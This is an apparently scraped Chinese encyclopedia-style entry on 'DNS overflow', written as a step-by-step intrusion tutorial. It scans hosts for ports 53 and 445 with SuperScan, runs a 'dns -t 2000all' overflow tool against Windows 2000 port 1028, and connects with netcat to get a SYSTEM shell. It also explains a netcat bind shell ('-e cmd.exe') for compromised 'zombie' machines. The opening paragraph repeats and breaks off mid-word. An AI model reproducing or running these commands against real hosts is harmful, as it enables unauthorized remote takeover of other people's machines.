DNS溢出

DNS溢出前提是必須要開放53、445連線埠 1、選擇superscan進行掃描,在連線埠列表中勾選上53、445連線埠,然後選擇主機段進行掃描。 2、選擇存在53、445連線埠的主機,在cmd下輸入dns -t ip對主機進行特定漏洞連線埠掃描,“1028 :Vulnerability”表示 1028連線埠存在溢

產品簡介,前提條件,

產品簡介

前提是必須要開放53、445連線埠 1、選擇superscan進行掃描,在連線埠列表中勾選上53、445連線埠,然後選擇主機段進行掃描。 2、選擇存在53、445連線埠的主機,在cmd下輸入dns -t ip對主機進行特定漏洞連線埠掃描,“1028 :Vulnerability”表示 1028連線埠存在溢

前提條件

前提是必須要開放53、445連線埠 1、選擇superscan進行掃描,在連線埠列表中勾選上53、445連線埠,然後選擇主機段進行掃描。
2、選擇存在53、445連線埠的主機,在cmd下輸入dns -t ip對主機進行特定漏洞連線埠掃描,“1028 :Vulnerability”表示
1028連線埠存在溢出漏洞,“os:window 2000”表示系統類型為window 2000。
3、在執行dns -t 2000all ip 1028 對目標主機進行溢出。connection to target host tcp port established 成功連線到主機的tcp連線埠上,
successfully bound to the vulnerale dcerpc interface 已經連線到對方的rpc連線埠上,os fingerprint result:windows 2000
系統指紋鑑定對方是wind2000系統,attack sent,check port 1100 攻擊代碼已經成功傳送,並嘗試連線1100連線埠。當出現最後這一句
提示語句的時候就意味著我們要成功了。
4、怎么連線對方的1100連線埠呢,當然我們要使用nc了。
5、nc全稱叫"netcat",這是一個非常簡單易用的基於tcp/ip協定(c/s模型的)的“瑞士軍刀”。下面介紹一下它的幾個常用功能
1、nc.exe -vv -l -p 6069,表示在本地6069連線埠上進行監聽。-vv:顯示詳細的信息。-l:進行監聽,監聽入站信息。-p:監聽所使用的
連線埠號。
2、正如我們遇到的情況,對方已經開放了一個連線埠。他在等待我們連線喔,連線上去會有什麼呢?當然是system許可權的shell了。
nc.exe -vv 127.0.0.1 5257,連線ip為127.0.0.1的5257連線埠。
3、還可以在本地監聽連線埠的同時綁定shell,就相當於一個telnet服務端。通常這個命令在肉雞上執行,然後當我們連線上去就可以獲得
這個shell了。nc.exe -l -p 5257 -t -e cmd.exe,在本機5257連線埠上監聽並綁定cmd.exe。-e 作用就是程式定向。-t以telnet的形式
來應答。
4、它可以用來手動對主機提交數據包(通常為80)連線埠,nc.exe -vv 127.0.0.1 80 <yan.txt,往ip為127.0.0.1的80連線埠提交yan.txt中
的內容。
6、介紹完nc.exe的四種常用方式,知道如何使用nc來連結對方的1100連線埠了吧,我們使用nc -vv 127.0.0.1 1100 連線對方的1100連線埠,
成功獲得了一個具有system許可權的cmdshell,想乾什麼就乾什麼了。

相關詞條

熱門詞條

聯絡我們